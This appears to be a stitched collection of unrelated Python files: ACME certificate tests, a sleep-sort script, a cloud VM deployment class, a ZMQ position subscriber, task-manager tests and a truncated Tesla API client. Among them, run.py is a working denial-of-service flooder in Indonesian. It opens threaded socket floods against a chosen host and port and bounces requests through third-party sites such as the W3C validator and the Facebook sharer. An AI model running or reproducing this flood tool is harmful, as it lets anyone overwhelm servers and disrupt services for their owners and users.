def test_csr_idn_sans(self):
self.assertEqual(self._call_csr('csr-idnsans.pem'),
self._get_idn_names())
def test_critical_san(self):
self.assertEqual(self._call_cert('critical-san.pem'),
['chicago-cubs.venafi.example', 'cubs.venafi.example'])
class RandomSnTest(unittest.TestCase):
"""Test for random certificate serial numbers."""
_multiprocess_can_split_ = True
def setUp(self):
self.cert_count = 5
self.serial_num = []
self.key = OpenSSL.crypto.PKey()
self.key.generate_key(OpenSSL.crypto.TYPE_RSA, 2048)
def test_sn_collisions(self):
from acme.crypto_util import gen_ss_cert
for _ in range(self.cert_count):
cert = gen_ss_cert(self.key, ['dummy'], force_san=True)
self.serial_num.append(cert.get_serial_number())
self.assertTrue(len(set(self.serial_num)) > 1)
class MakeCSRTest(unittest.TestCase):
"""Test for standalone functions."""
@classmethod
def _call_with_key(cls, *args, **kwargs):
privkey = OpenSSL.crypto.PKey()
privkey.generate_key(OpenSSL.crypto.TYPE_RSA, 2048)
privkey_pem = OpenSSL.crypto.dump_privatekey(OpenSSL.crypto.FILETYPE_PEM, privkey)
from acme.crypto_util import make_csr
return make_csr(privkey_pem, *args, **kwargs)
def test_make_csr(self):
csr_pem = self._call_with_key(["a.example", "b.example"])
self.assertTrue(b'--BEGIN CERTIFICATE REQUEST--' in csr_pem)
self.assertTrue(b'--END CERTIFICATE REQUEST--' in csr_pem)
csr = OpenSSL.crypto.load_certificate_request(
OpenSSL.crypto.FILETYPE_PEM, csr_pem)
# In pyopenssl 0.13 (used with TOXENV=py26-oldest and py27-oldest), csr
# objects don't have a get_extensions() method, so we skip this test if
# the method isn't available.
if hasattr(csr, 'get_extensions'):
self.assertEquals(len(csr.get_extensions()), 1)
self.assertEquals(csr.get_extensions()[0].get_data(),
OpenSSL.crypto.X509Extension(
b'subjectAltName',
critical=False,
value=b'DNS:a.example, DNS:b.example',
).get_data(),
)
def test_make_csr_must_staple(self):
csr_pem = self._call_with_key(["a.example"], must_staple=True)
csr = OpenSSL.crypto.load_certificate_request(
OpenSSL.crypto.FILETYPE_PEM, csr_pem)
# In pyopenssl 0.13 (used with TOXENV=py26-oldest and py27-oldest), csr
# objects don't have a get_extensions() method, so we skip this test if
# the method isn't available.
if hasattr(csr, 'get_extensions'):
self.assertEquals(len(csr.get_extensions()), 2)
# NOTE: Ideally we would filter by the TLS Feature OID, but
# OpenSSL.crypto.X509Extension doesn't give us the extension's raw OID,
# and the shortname field is just "UNDEF"
must_staple_exts = [e for e in csr.get_extensions()
if e.get_data() == b"0\x03\x02\x01\x05"]
self.assertEqual(len(must_staple_exts), 1,
"Expected exactly one Must Staple extension")
if __name__ == '__main__':
unittest.main() # pragma: no cover
|
sleep_sort.py
|
import sys
import threading
from time import sleep
def arg_to_list(string):
return [int(x.strip(" "), 10) for x in string.split(',')]
def sleep_sort(i, output):
sleep(i)
output.append(i)
def error_and_exit():
print('Usage: please provide a list of at least two integers to sort in the format "1, 2, 3, 4, 5"')
sys.exit()
def main():
if len(sys.argv) == 1 or not sys.argv[1] or len(sys.argv[1].split(",")) == 1:
error_and_exit()
array = arg_to_list(sys.argv[1])
threads = []
output = []
for i in array:
arg_tuple = (i, output)
thread = threading.Thread(target=sleep_sort, args=arg_tuple)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
print(output)
main()
|
run.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# python 3.3.2+ Indonesian Dos Script v.1
# by Can Yalçın
# only for legal purpose
from queue import Queue
from optparse import OptionParser
import time,sys,socket,threading,logging,urllib.request,random
import os
R = "\033[91;1m"
G = "\033[92;1m"
Y = "\033[93;1m"
B = "\033[94;1m"
P = "\033[95;1m"
A = "\033[96;1m"
W = "\033[90;1m"
WL = "\033[0;1m"
def user_agent():
global uagent
uagent=[]
uagent.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")
uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")
return(uagent)
def my_bots():
global bots
bots=[]
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
return(bots)
def noobs(url):
try:
while True:
req = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent': random.choice(uagent)}))
print(R+"[+]\033[95m Bot Sedang Menembak ",R+"==>----\033[0m")
time.sleep(.1)
except:
time.sleep(.1)
def down_it(item):
try:
while True:
packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent: "+random.choice(uagent)+"\n"+data).encode('utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
if s.sendto( packet, (host, int(port)) ):
s.shutdown(1)
print ("\033[90;1m[+] Indonesian Cyber\033[0m \033[90m [+]",B+"Mengirim paket ddos.. ^_^ \033[0m")
else:
s.shutdown(1)
print("\033[91m[+] server down bos... ^_^\033[0m")
time.sleep(0)
except socket.error as e:
print("\033[91m[?] tidak ada koneksi! server mungkin down\033[0m")
#print("\033[91m",e,"\033[0m")
time.sleep(0)
def dos():
while True:
item = q.get()
down_it(item)
q.task_done()
def dos2():
while True:
item=w.get()
noobs(random.choice(bots)+"http://"+host)
w.task_done()
def usage():
print ('''\033[91;1m \033[90;1mTHANKS TO: Can Yalcin \033[0;1m
|`\ |`| ___ ___ |`|__ ___.
| \| |/ _ \ / _ \| '_ \/ __||
| |\ | (_) | (_) | |_) \__ \\ Life Of
|_| \_|\___/ \___/|_.__/|___// Programmer
''',W+'''+---------------------------------------+
\033[92m [+]\033[96m Cara menggunakan :
python3 ddos.py -s target -p 80 -t 135
''',W+'''+---------------------------------------+
''',G+'''[-h]''',W+'''=>''',P+'''bantuan ''',W+''' | DDOS Attack
''',G+'''[-s]''',W+'''=>''',P+'''ip target ''',W+''' |______________
''',G+'''[-p]''',W+'''=>''',P+'''nilai port 80 ''',W+'''| Mod by:
''',G+'''[-t]''',W+'''=>''',P+'''nilai turbo 135''',W+'''|pace usa gans
''',W+'''+---------------------------------------+''',R+''' ''')
sys.exit()
def get_parameters():
global host
global port
global thr
global item
optp = OptionParser(add_help_option=False,epilog="Hammers")
optp.add_option("-q","--quiet", help="set logging to ERROR",action="store_const", dest="loglevel",const=logging.ERROR, default=logging.INFO)
optp.add_option("-s","--server", dest="host",help="attack to server ip -s ip")
optp.add_option("-p","--port",type="int",dest="port",help="-p 80 default 80")
optp.add_option("-t","--turbo",type="int",dest="turbo",help="default 135 -t 135")
optp.add_option("-h","--help",dest="help",action='store_true',help="help you")
opts, args = optp.parse_args()
logging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s')
if opts.help:
usage()
if opts.host is not None:
host = opts.host
else:
usage()
if opts.port is None:
port = 80
else:
port = opts.port
if opts.turbo is None:
thr = 135
else:
thr = opts.turbo
# reading headers
global data
headers = open("headers.txt", "r")
data = headers.read()
headers.close()
#task queue are q,w
q = Queue()
w = Queue()
if __name__ == '__main__':
if len(sys.argv) < 2:
usage()
get_parameters()
print(G+" IP","\033[94m",host,G+" port: ",B+str(port),G+" turbo: ",B+str(thr),"\033[0m")
print("\033[90;1m Tunggu boss",WL+".........",P+"Klo Kuotanya abis jangan nangis ya... :v\033[0m")
user_agent()
my_bots()
time.sleep(3)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
s.settimeout(1)
except socket.error as e:
print("\033[91mcek ip target dan port Boss... !\033[0m")
usage()
while True:
for i in range(int(thr)):
t = threading.Thread(target=dos)
t.daemon = True # if thread is exist, it dies
t.start()
t2 = threading.Thread(target=dos2)
t2.daemon = True # if thread is exist, it dies
t2.start()
start = time.time()
#tasking
item = 0
while True:
if (item>1800): # for no memory crash
item=0
time.sleep(.1)
item = item + 1
q.put(item)
w.put(item)
q.join()
w.join()
|
deployment.py
|
import logging
from threading import Thread
from deployer.components.vmgroup import VMGroup
from deployer.errors import ArgumentsError
from deployer.utils import generate_ssh_key_pair, get_random_file_name
__author__ = 'Giannis Giannakopoulos'
class Deployment:
"""
This class represents a deployment entity. It holds a number of VMGroups and
it is responsible for the allocation and the orchestration of the cloud resources.
"""
def __init__(self):
self.inject_ssh_key_pair = True
self.update_hosts = True
self.set_hostnames = True
self.__vm_groups = list()
self.cloud_connector = None
self.name = ''
self.private_network = -1
def configure(self, description):
"""
This method configures new VMgroup objects according to the received description.
:param description:
:return:
"""
if self.cloud_connector is None:
raise ArgumentsError("Connector must be set!")
self.name = description['name']
if 'inject_ssh_keypair' in description['actions']:
self.inject_ssh_key_pair = description['actions']['inject_ssh_keypair']
if 'update_etc_hosts' in description['actions']:
self.update_hosts = description['actions']['update_etc_hosts']
if 'set_hostnames' in description['actions']:
self.set_hostnames = description['actions']['set_hostnames']
for group in description['groups']:
g = VMGroup()
g.configure(group)
g.cloud_connector = self.cloud_connector.clone()
for ability, value in group['provider_actions'].iteritems():
setattr(g.cloud_connector, ability, value)
self.__vm_groups.append(g)
def launch(self):
logging.getLogger("deployment").info("Starting deployment")
self.__spawn_threads('create')
logging.getLogger("deployment").info("VMs visible -- construcing and injecting key pairs")
if self.inject_ssh_key_pair:
keys = generate_ssh_key_pair(keys_prefix=get_random_file_name())
self.__spawn_threads('inject_ssh_key', args=[keys['private'], keys['public']])
if self.update_hosts:
logging.getLogger("deployment").info("Ok -- setting /etc/hosts files")
hosts = dict()
for vmg in self.__vm_groups:
for ip, host in vmg.get_addresses().iteritems():
hosts[ip] = host
for vmg in self.__vm_groups:
vmg.set_hosts(hosts)
if self.set_hostnames:
logging.getLogger("deployment").info("Setting hostnames")
self.__spawn_threads('set_hostnames')
def execute_script(self):
self.__spawn_threads('execute_script')
def has_more_steps(self):
for g in self.__vm_groups:
if g.has_more_scripts():
return True
return False
def terminate(self):
self.__spawn_threads('delete')
self.cloud_connector.cleanup()
def __spawn_threads(self, method_to_call, args=None):
"""
:param method_to_call:
:param args:
"""
threads = []
for vm in self.__vm_groups:
if args is None:
t = Thread(target=getattr(vm, method_to_call))
else:
t = Thread(target=getattr(vm, method_to_call), args=args)
t.start()
threads.append(t)
for t in threads:
t.join()
def serialize(self):
d = dict()
d['name'] = self.name
d['groups'] = list()
d['connector'] = self.cloud_connector.serialize()
for g in self.__vm_groups:
d['groups'].append(g.serialize())
return d
def deserialize(self, state, cloud_connector):
self.cloud_connector = cloud_connector
for key, value in state['connector'].iteritems():
setattr(self.cloud_connector, key, value)
self.name = state['name']
for group_state in state['groups']:
group = VMGroup()
group.deserialize(group_state, cloud_connector.clone())
self.__vm_groups.append(group)
|
positionZMQSub.py
|
'''
All components of this library are licensed under the BSD 3-Clause
License.
Copyright (c) 2015-, Algorithmic Robotics and Control Group @Rutgers
(http://arc.cs.rutgers.edu). All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer. Redistributions
in binary form must reproduce the above copyright notice, this list of
conditions and the following disclaimer in the documentation and/or
other materials provided with the distribution. Neither the name of
Rutgers University nor the names of the contributors may be used to
endorse or promote products derived from this software without specific
prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys
import zmq
import time
import threading
from threading import Thread
import copy
import utils
# Dictionary
carPosiDict = dict()
# Create a threading lock for safe access to dictionary
lock = threading.Lock()
def _pull_zmq_data():
#Connect to zmq publisher
context = zmq.Context()
socket = context.socket(zmq.SUB)
socket
print "Collecting update from server: tcp://%s:%s" \
%(utils.zmqPublisherIP, utils.zmqPublisherPort)
socket.connect ("tcp://%s:%s" %(utils.zmqPublisherIP,
utils.zmqPublisherPort))
print "Connected..."
socket.setsockopt(zmq.SUBSCRIBE, "")
#Continuous update of car position, if available
while True:
string = socket.recv()
firstSpaceAt = 1
while string[firstSpaceAt] != " ":
firstSpaceAt += 1
carID, rest = string[:firstSpaceAt], string[(firstSpaceAt + 1):]
with lock:
carPosiDict[int(carID)] = rest
def _get_all_car_position_data():
with lock:
tempData = copy.deepcopy(carPosiDict)
return tempData
def _get_car_position_data(carID):
tempData = ""
with lock:
if carPosiDict.has_key(carID):
tempData = carPosiDict[carID]
return tempData
t = Thread(target = _pull_zmq_data)
t.setDaemon(True)
def _initialize_zmq():
t.start()
time.sleep(0.3)
def _stop_zmq():
return
|
test_task_manager.py
|
# SPDX-FileCopyrightText: 2017 Fermi Research Alliance, LLC
# SPDX-License-Identifier: Apache-2.0
import os
import threading
from unittest.mock import patch
import pytest
import decisionengine.framework.config.policies as policies
from decisionengine.framework.config.ValidConfig import ValidConfig
from decisionengine.framework.dataspace import datablock
from decisionengine.framework.taskmanager.TaskManager import State, TaskManager
from decisionengine.framework.taskmanager.tests.fixtures import ( # noqa: F401
DATABASES_TO_TEST,
dataspace,
PG_DE_DB_WITHOUT_SCHEMA,
PG_PROG,
SQLALCHEMY_PG_WITH_SCHEMA,
SQLALCHEMY_TEMPFILE_SQLITE,
)
_CWD = os.path.dirname(os.path.abspath(__file__))
_CONFIG_PATH = os.path.join(_CWD, "../../tests/etc/decisionengine")
_CHANNEL_CONFIG_DIR = os.path.join(_CWD, "channels")
_TEST_CHANNEL_NAMES = [
"test_channel",
]
_TEST_CHANNEL_NAMES2 = [
"test_channel2",
]
class RunChannel:
def __init__(self, global_config, channel):
self._tm = TaskManager(channel, get_channel_config(channel), global_config)
self._thread = threading.Thread(name=channel, target=self._tm.run)
def __enter__(self):
self._thread.start()
self._tm.state.wait_while(State.BOOT)
return self._tm
def __exit__(self, type, value, traceback):
if type:
return False
self._thread.join()
def get_channel_config(name):
return ValidConfig(os.path.join(_CHANNEL_CONFIG_DIR, name + ".jsonnet"))
@pytest.fixture()
@pytest.mark.usefixtures("dataspace")
def global_config(dataspace): # noqa: F811
conf = ValidConfig(policies.global_config_file(_CONFIG_PATH))
conf["dataspace"] = dataspace.config["dataspace"]
yield conf
@pytest.mark.usefixtures("global_config")
def test_taskmanager_init(global_config):
for channel in _TEST_CHANNEL_NAMES:
task_manager = TaskManager(channel, get_channel_config(channel), global_config)
assert task_manager.state.has_value(State.BOOT)
@pytest.mark.usefixtures("global_config")
def test_taskmanager_channel_name_in_config(global_config):
for channel in _TEST_CHANNEL_NAMES2:
task_manager = TaskManager(channel, get_channel_config(channel), global_config)
assert task_manager.name == "name_in_config"
@pytest.mark.usefixtures("global_config")
def test_set_to_shutdown(global_config):
for channel in _TEST_CHANNEL_NAMES:
with RunChannel(global_config, channel) as task_manager:
m = "decisionengine.framework.tests.PublisherNOP.PublisherNOP.shutdown"
with patch(m) as mocked_shutdown:
task_manager.set_to_shutdown()
mocked_shutdown.assert_called()
assert task_manager.state.has_value(State.SHUTDOWN)
@pytest.mark.usefixtures("global_config")
def test_take_task_manager_offline(global_config):
for channel in _TEST_CHANNEL_NAMES:
with RunChannel(global_config, channel) as task_manager:
task_manager.take_offline()
assert task_manager.state.has_value(State.OFFLINE)
assert task_manager.get_state_value() == State.OFFLINE.value
@pytest.mark.usefixtures("global_config")
def test_failing_publisher(global_config):
task_manager = TaskManager("failing_publisher", get_channel_config("failing_publisher"), global_config)
task_manager.run()
assert task_manager.state.has_value(State.OFFLINE)
@pytest.mark.usefixtures("global_config", "dataspace")
def test_bad_datablock(global_config, dataspace, caplog): # noqa: F811
for channel in _TEST_CHANNEL_NAMES:
with RunChannel(global_config, channel) as task_manager:
dblock = datablock.DataBlock(dataspace, channel)
task_manager.data_block_put("bad_string", "header", dblock)
task_manager.take_offline()
assert "data_block put expecting" in caplog.text
@pytest.mark.usefixtures("global_config")
def test_no_data_to_transform(global_config):
for channel in _TEST_CHANNEL_NAMES:
with RunChannel(global_config, channel) as task_manager:
task_manager.run_transforms()
with pytest.raises(RuntimeError, match="Cannot run logic engine on data block that is 'None'."):
task_manager.run_logic_engine(None)
task_manager.take_offline()
@pytest.mark.usefixtures("global_config")
def test_run_source_only_once(global_config):
with RunChannel(global_config, "run_source_once") as task_manager:
task_manager.take_offline()
@pytest.mark.usefixtures("global_config")
def test_multiple_logic_engines_not_supported(global_config):
with pytest.raises(RuntimeError, match="Cannot support more than one logic engine per channel."):
channel = "multiple_logic_engines"
TaskManager(channel, get_channel_config(channel), global_config)
|
TeslaAPI.py
|
import base64
import hashlib
import json
import logging
import os
import re
import requests
from threading import Thread
import time
from urllib.parse import parse_qs
from ww import f
logger = logging.getLogger("\U0001F697 TeslaAPI")
class TeslaAPI:
__apiCaptcha = None
__apiCaptchaCode = None
__apiCaptchaInterface = None
__authURL = "https://auth.tesla.com/oauth2/v3/authorize"
callbackURL = "https://auth.tesla.com/void/callback"
captchaURL = "https://auth.tesla.com/captcha"
carApiLastErrorTime = 0
carApiBearerToken = ""
carApiRefreshToken = ""
carApiTokenExpireTime = time.time()
carApiLastStartOrStopChargeTime = 0
carApiLastChargeLimitApplyTime = 0
clientID = "81527cff06843c8634fdc09e8ac0abefb46ac849f38fe1e431c2ef2106796384"
clientSecret = "c7257eb71a564034f9419ee651c7d0e5f7aa6bfbd18bafb5c5c033b093bb2fa3"
lastChargeLimitApplied = 0
lastChargeCheck = 0
chargeUpdateInterval = 1800
carApiVehicles = []
config = None
master = None
__email = None
errorCount = 0
maxLoginRetries = 10
minChargeLevel = -1
params = None
__password = None
refreshURL = "https://owner-api.teslamotors.com/oauth/token"
__resp = None
session = None
verifier = ""
# Transient errors are ones that usually disappear if we retry the car API
# command a minute or less later.
# 'vehicle unavailable:' sounds like it implies the car is out of connection
# range, but I once saw it returned by drive_state after wake_up returned
# 'online'. In that case, the car is reachable, but drive_state failed for some
# reason. Thus we consider it a transient error.
# Error strings below need only match the start of an error response such as:
# {'response': None, 'error_description': '',
# 'error': 'operation_timedout for txid `4853e3ad74de12733f8cc957c9f60040`}'}
carApiTransientErrors = [
"upstream internal error",
"operation_timedout",
"vehicle unavailable",
]
def __init__(self, master):
self.master = master
try:
self.config = master.config
self.minChargeLevel = self.config["config"].get("minChargeLevel", -1)
self.chargeUpdateInterval = self.config["config"].get(
"cloudUpdateInterval", 1800
)
except KeyError:
pass
def addVehicle(self, json):
self.carApiVehicles.append(CarApiVehicle(json, self, self.config))
return True
def apiDebugInterface(self, command, vehicleID, parameters):
# Provides an interface from the Web UI to allow commands to be run interactively
# Map vehicle ID back to vehicle object
vehicle = self.getVehicleByID(int(vehicleID))
# Get parameters
params = {}
try:
params = json.loads(parameters)
except json.decoder.JSONDecodeError:
pass
# Execute specified command
if command == "setChargeRate":
charge_rate = params.get("charge_rate", 0)
self.setChargeRate(charge_rate, vehicle)
return True
elif command == "wakeVehicle":
self.wakeVehicle(vehicle)
return True
# If we make it here, we did not execute a command
return False
def apiLogin(self, email, password):
# Populate auth details for Phase 1
self.__email = email
self.__password = password
for attempt in range(self.maxLoginRetries):
self.verifier = base64.urlsafe_b64encode(os.urandom(86)).rstrip(b"=")
challenge = base64.urlsafe_b64encode(
hashlib.sha256(self.verifier).digest()
).rstrip(b"=")
state = (
base64.urlsafe_b64encode(os.urandom(16)).rstrip(b"=").decode("utf-8")
)
self.params = (
("client_id", "ownerapi"),
("code_challenge", challenge),
("code_challenge_method", "S256"),
("redirect_uri", self.callbackURL),
("response_type", "code"),
("scope", "openid email offline_access"),
("state", state),
)
self.session = requests.Session()
self.__resp = self.session.get(self.__authURL, params=self.params)
if self.__resp.ok and "<title>" in self.__resp.text:
logger.log(
logging.INFO6,
"Tesla Auth form fetch success, attempt: " + str(attempt),
)
if 'img data-id="captcha"' in self.__resp.text:
logger.log(
logging.INFO6,
"Tesla Auth form challenged us for Captcha. Redirecting.",
)
self.getApiCaptcha()
return "Phase1Captcha"
elif "g-recaptcha" in self.__resp.text:
logger.log(
logging.INFO6,
"Tesla Auth form challenged us for Google Recaptcha. Redirecting.",
)
return "Phase1Recaptcha"
else:
return self.apiLoginPhaseOne()
else:
logger.log(
logging.INFO6,
"Tesla auth form fetch failed, attempt: " + str(attempt),
)
time.sleep(3)
else:
logger.log(
logging.INFO2,
"Wasn't able to find authentication form after "
+ str(attempt)
+ " attempts",
)
return "Phase1Error"
def apiLoginPhaseOne(self):
# Picks up on the first phase of authentication, after redirecting to
# handle Captcha if this was requested, or directly if we were lucky
# enough not to be challenged.
csrf = re.search(r'name="_csrf".+value="([^"]+)"', self.__resp.text).group(1)
transaction_id = re.search(
r'name="transaction_id".+value="([^"]+)"', self.__resp.text
).group(1)
if not csrf or not transaction_id:
# These two parameters are required for Phase 1 (Authentication) auth
# If they are missing, we raise an appropriate error to the user's attention
return "Phase1Error"
data = {
"_csrf": csrf,
"_phase": "authenticate",
"_process": "1",
"transaction_id": transaction_id,
"cancel": "",
"identity": self.__email,
"credential": self.__password,
}
# If a captcha code is stored, inject it into the data parameter
if self.__apiCaptchaCode and self.__apiCaptchaInterface == "captcha":
data["captcha"] = self.__apiCaptchaCode
# Clear captcha data
self.__apiCaptcha = None
elif self.__apiCaptchaCode and self.__apiCaptchaInterface == "recaptcha":
data["recaptcha"] = self.__apiCaptchaCode
data["g-recaptcha-response"] = self.__apiCaptchaCode
# Clear stored credentials
self.__email = None
self.__password = None
# Call login Phase 2
return self.apiLoginPhaseTwo(data)
def apiLoginPhaseTwo(self, data):
for attempt in range(self.maxLoginRetries):
resp = self.session.post(
self.__authURL, params=self.params, data=data, allow_redirects=False
)
if resp.ok and (resp.status_code == 302 or "<title>" in resp.text):
logger.log(
logging.INFO2,
"Posted auth form successfully after " + str(attempt) + " attempts",
)
break
time.sleep(3)
else:
logger.log(
logging.INFO2,
"Wasn't able to post authentication form after "
+ str(attempt)
+ " attempts",
)
return "Phase2Error"
if resp.status_code == 200 and "/mfa/verify" in resp.text:
# This account is using MFA, redirect to MFA code entry page
return "MFA/" + str(data["transaction_id"])
try:
code = parse_qs(resp.headers["location"])[self.callbackURL + "?code"]
except KeyError:
return "Phase2ErrorTip"
data = {
"grant_type": "authorization_code",
"client_id": "ownerapi",
"code_verifier": self.verifier.decode("utf-8"),
"code": code,
"redirect_uri": self.callbackURL,
}
resp = self.session.post("https://auth.tesla.com/oauth2/v3/token", json=data)
access_token = resp.json()["access_token"]
headers = {"authorization": "bearer " + access_token}
data = {
"grant_type": "urn:ietf:params:oauth:grant-type:jwt-bearer",
"client_id": self.clientID,
}
resp = self.session.post(
"https://owner-api.teslamotors.com/oauth/token", headers=headers, json=data
)
try:
self.setCarApiBearerToken(resp.json()["access_token"])
self.setCarApiRefreshToken(resp.json()["refresh_token"])
self.setCarApiTokenExpireTime(time.time() + resp.json()["expires_in"])
self.master.queue_background_task({"cmd": "saveSettings"})
return True
except KeyError:
logger.log(
logging.INFO2,
"ERROR: Can't access Tesla car via API. Please log in again via web interface.",
)
self.updateCarApiLastErrorTime()
# In addition to setting carApiLastErrorTime, erase tokens to
# prevent further authorization attempts until user enters password
# on web interface. I feel this is safer than trying to log in every
# ten minutes with a bad token because Tesla might decide to block
# remote access to your car after too many authorization errors.
self.setCarApiBearerToken("")
self.setCarApiRefreshToken("")
self.master.queue_background_task({"cmd": "saveSettings"})
return False
def apiRefresh(self):
# Refresh tokens expire in 45
# days when first issued, so we'll get a new token every 15 days.
headers = {"accept": "application/json", "Content-Type": "application/json"}
data = {
"client_id": self.clientID,
"client_secret": self.clientSecret,
"grant_type": "refresh_token",
"refresh_token": self.getCarApiRefreshToken(),
}
req = None
now = time.time()
try:
req = requests.post(self.refreshURL, headers=headers, json=data)
logger.log(logging.INFO2, "Car API request" + str(req))
apiResponseDict = json.loads(req.text)
except requests.exceptions.RequestException:
pass
except ValueError:
pass
except json.decoder.JSONDecodeError:
pass
try:
logger.log(logging.INFO4, "Car API auth response" + str(apiResponseDict))
self.setCarApiBearerToken(apiResponseDict["access_token"])
self.setCarApiRefreshToken(apiResponseDict["refresh_token"])
self.setCarApiTokenExpireTime(now + apiResponseDict["expires_in"])
self.master.queue_background_task({"cmd": "saveSettings"})
except KeyError:
logger.log(
logging.INFO2,
"TeslaAPI",
"ERROR: Can't access Tesla car via API. Please log in again via web interface.",
)
self.updateCarApiLastErrorTime()
# Instead of just setting carApiLastErrorTime, erase tokens to
# prevent further authorization attempts until user enters password
# on web interface. I feel this is safer than trying to log in every
# ten minutes with a bad token because Tesla might decide to block
# remote access to your car after too many authorization errors.
self.setCarApiBearerToken("")
self.setCarApiRefreshToken("")
self.master.queue_background_task({"cmd": "saveSettings"})
def car_api_available(
self, email=None, password=None, charge=None, applyLimit=None
):
now = time.time()
needSleep = False
apiResponseDict = {}
if self.getCarApiRetryRemaining():
# It's been under carApiErrorRetryMins minutes since the car API
# generated an error. To keep strain off Tesla's API servers, wait
# carApiErrorRetryMins mins till we try again. This delay could be
# reduced if you feel the need. It's mostly here to deal with unexpected
# errors that are hopefully transient.
# https://teslamotorsclub.com/tmc/threads/model-s-rest-api.13410/page-114#post-2732052
# says he tested hammering the servers with requests as fast as possible
# and was automatically blacklisted after 2 minutes. Waiting 30 mins was
# enough to clear the blacklist. So at this point it seems Tesla has
# accepted that third party apps use the API and deals with bad behavior
# automatically.
logger.log(
logging.INFO6,
"Car API disabled for "
+ str(self.getCarApiRetryRemaining())
+ " more seconds due to recent error.",
)
return False
else:
logger.log(
logging.INFO8,
"Entering car_api_available - next step is to query Tesla API",
)
# Authentiate to Tesla API
if not self.master.tokenSyncEnabled() and (
self.getCarApiBearerToken() == ""
or self.getCarApiTokenExpireTime() - now < 30 * 24 * 60 * 60
):
if self.getCarApiRefreshToken() != "":
headers = {
"accept": "application/json",
"Content-Type": "application/json",
}
data = {
"client_id": self.clientID,
"client_secret": self.clientSecret,
"grant_type": "refresh_token",
"refresh_token": self.getCarApiRefreshToken(),
}
logger.log(logging.INFO8, "Attempting token refresh")
self.apiRefresh()
elif email is not None and password is not None:
logger.log(logging.INFO8, "Attempting password auth")
ret = self.apiLogin(email, password)
# If any string is returned, we redirect to it. This helps with MFA login flow
if (
str(ret) != "True"
and str(ret) != "False"
and str(ret) != ""
and str(ret) != "None"
):
return ret
if self.master.tokenSyncEnabled():
tmv = self.master.getModuleByName("TeslaMateVehicle")
logger.log(logging.INFO8, "Jah we gant eki testen eni")
if (now - tmv.lastSync) > 60*60:
tmv.doSyncTokens()
if self.getCarApiBearerToken() != "":
if self.getVehicleCount() < 1:
url = "https://owner-api.teslamotors.com/api/1/vehicles"
logger.log(logging.INFO8, "using token: " + str(self.getCarApiBearerToken()))
headers = {
"accept": "application/json",
"Authorization": "Bearer " + self.getCarApiBearerToken(),
}
try:
req = requests.get(url, headers=headers)
logger.log(logging.INFO8, "Car API cmd vehicles " + str(req))
apiResponseDict = json.loads(req.text)
except requests.exceptions.RequestException:
logger.info("Failed to make API call " + url)
logger.log(logging.INFO6, "Response: " + req.text)
pass
except json.decoder.JSONDecodeError:
logger.info("Could not parse JSON result from " + url)
logger.log(logging.INFO6, "Response: " + req.text)
pass
try:
logger.debug("Car API vehicle list" + str(apiResponseDict) + "\n")
for i in range(0, apiResponseDict["count"]):
self.addVehicle(apiResponseDict["response"][i])
self.resetCarApiLastErrorTime()
except (KeyError, TypeError):
# This catches cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist in
# apiResponseDict.
logger.log(
logging.INFO2,
"ERROR: Can't get list of vehicles via Tesla car API. Will try again in "
+ str(self.getCarApiErrorRetryMins())
+ " minutes.",
)
self.updateCarApiLastErrorTime()
return False
if self.getVehicleCount() > 0 and (charge or applyLimit):
# Wake cars if needed
for vehicle in self.getCarApiVehicles():
if charge is True and vehicle.stopAskingToStartCharging:
# Vehicle is in a state (complete or charging) already
# which doesn't make sense for us to keep requesting it
# to start charging, so we will stop.
logger.log(
logging.DEBUG2,
"Don't repeatedly request API to charge "
+ vehicle.name
+ ", because vehicle.stopAskingToStartCharging "
+ " == True - it has already been requested.",
)
continue
if applyLimit is True and vehicle.stopTryingToApplyLimit:
logger.log(
logging.DEBUG2,
"Don't wake "
+ vehicle.name
+ " to set the charge limit - it has already been set",
)
continue
if self.getCarApiRetryRemaining():
# It's been under carApiErrorRetryMins minutes since the car
